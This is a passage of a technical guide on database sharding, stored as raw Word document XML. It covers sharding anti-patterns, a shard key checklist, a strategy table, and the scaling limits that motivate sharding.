        <w:t xml:space="preserve">  → Growing to 32 shards requires changing the modulus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145DA4FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → 50%+ of data must migrate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F6695" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Application code must be updated and deployed atomically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F58D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7BDF18F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>BETTER: Consistent hashing or virtual shards from the start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CDFA80" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Adding nodes moves minimal data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FC5A8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → No application code change needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651EB0F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.5 Ignoring Data Locality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65780C5C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EFF56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>BAD: Every user request requires data from 5 different shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28165EE2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Every request is a scatter-gather → high latency, complex failure handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42D95E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0899E01D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>BETTER: Design shard key so 95%+ of queries are single-shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123780D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Only analytics/admin queries do scatter-gather.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76569CCE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="5499BE38">
          <v:rect id="_x0000_i5772" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA8FD5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Summary — The Complete Sharding Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCC81A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 The Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489572AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D1989" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A96993" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ DO YOU NEED SHARDING?                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43E6D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FBE062" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ Is your database hitting its limits despite:                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DBE972" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│   ✓ Query optimization?                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9765BA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│   ✓ Proper indexing?                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E264399" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│   ✓ Read replicas?                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC1E4F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│   ✓ Caching?                                                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F239710" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│   ✓ Vertical scaling?                                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23671CE7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC8676" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ YES → Shard. But choose carefully.                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F2DB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ NO  → Don't. The complexity isn't worth it.                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42999EF2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A737F1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Shard Key Selection Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE01CCD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBDD730" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>✓ High cardinality (many distinct values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F529CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>✓ Uniform distribution (no extreme skew)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08515D64" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>✓ Included in most queries (routing without scatter-gather)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478768F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>✓ Stable (doesn't change — avoids cross-shard migration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C690C64" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>✓ Co-locates related data (entities that transact together)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D13E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>✓ Supports your most critical access patterns as single-shard queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1218A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Strategy Selection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298"/>
        <w:gridCol w:w="1694"/>
        <w:gridCol w:w="3609"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="6E43649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3093CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario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A33C85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Strategy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55AFBB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Shard Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="1DDA158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77A00C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Multi-tenant SaaS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43AB13" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Hash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06D304" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>tenant_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0EA21B5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778932" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Social network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D717C2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Hash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B74A17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>user_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="5C41027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FEA66C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>E-commerce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437FAF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Hash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863F8D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>customer_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="6D47374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08DEB5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Time-series / IoT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549E2C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Range (time)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44BE59" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>timestamp (+ device_id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="44B26BF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21341A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Geographic data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D8AD06" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Geo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72A861" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>region/country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="1B1CDE7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E52E64" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>General (NewSQL)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315A43" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Automatic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60B56C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Primary key (database decides)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D8EE966" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.4 The Fundamental Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9CBF0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sharding trades query flexibility for write scalability.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> By splitting data across machines, you gain the ability to handle more writes and store more data than any single machine can — but you lose the ability to efficiently query across the entire dataset. The art of sharding is choosing a partition strategy that makes your MOST COMMON queries single-shard (fast, simple) while accepting that your LESS COMMON queries become cross-shard (expensive, complex). Design for the 95% case, and build separate systems (search, analytics, materialized views) for the remaining 5%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DBDE7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sharding — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B14B1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="2C42793E">
          <v:rect id="_x0000_i5853" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E65B8F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Sharding Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75E6CB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sharding is not simply "splitting data across multiple databases." That describes the mechanism but misses the engineering depth entirely. Sharding is the discipline of </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">horizontally partitioning a dataset across independent storage nodes such that each node owns a disjoint, exhaustive subset of the data, enabling the system to scale write throughput, storage capacity, and working set size beyond the limits of any </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>single machine — while managing the profound complexity this introduces in query routing, distributed transactions, rebalancing, and operational overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923FEBE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The engineering problem sharding solves is a fundamental physical constraint: </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a single machine has finite resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t>. A PostgreSQL instance on the largest available cloud VM (768GB RAM, 192 vCPUs, 64TB NVMe SSD) can handle approximately:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F0A8C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1575"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>~500,000 simple read queries per second (with effective caching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F868C8A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1575"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>~50,000 write transactions per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA6C37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1575"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>~60TB of data before I/O becomes the bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA64AE8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>These are large numbers. Most systems never need to exceed them. But when they do — when a dataset grows to hundreds of terabytes, when write rates exceed hundreds of thousands per second, when the working set no longer fits in the largest available RAM — vertical scaling (buying bigger hardware) reaches its physical limit. No amount of money can buy a machine with 10PB of RAM. Sharding is the answer to this limit: distribute the data across N machines, each handling 1/N of the load, collectively providing N times the capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594605A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>But sharding introduces a new class of problems that simply do not exist on a single machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38412DC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The routing problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> For any given query, which shard contains the relevant data? This requires a mapping function from data to shard, maintained consistently as data grows and shards are added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785A693" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The distributed query problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Queries that touch data on multiple shards must be split, executed in parallel across shards, and their results merged — adding network round trips, partial failure complexity, and result aggregation overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D541E3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The distributed transaction problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> A transaction that modifies data on multiple shards cannot use the local ACID guarantees of a single database engine — it requires a distributed commit protocol (2PC or consensus), dramatically increasing complexity and latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F18AC8D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The rebalancing problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> As data grows unevenly or shards are added, data must be migrated between shards without downtime, without data loss, and without violating consistency guarantees — one of the most operationally complex procedures in distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A08560" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Understanding sharding requires understanding all of these dimensions simultaneously, because the choice of sharding strategy determines which of these problems manifest and how severely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192979C9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="0D320330">
          <v:rect id="_x0000_i5854" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6731D98D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Physical Foundation — What Sharding Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E73E5A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single-Node Scaling Limits — Where Sharding Becomes Necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DA23D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Before sharding, every other scaling option should be exhausted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85DA19" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CC60D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Scaling options in order of complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116B9D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6FE33946" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>1. Vertical scaling (buy more RAM, faster CPU, faster disk):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B193507" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Eliminates all distributed systems complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11143E77" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Hard limit: largest available instance (~768GB RAM, ~64TB NVMe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD0484" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   Cost: exponentially increasing per unit of capacity</w:t>
      </w:r>
    </w:p>
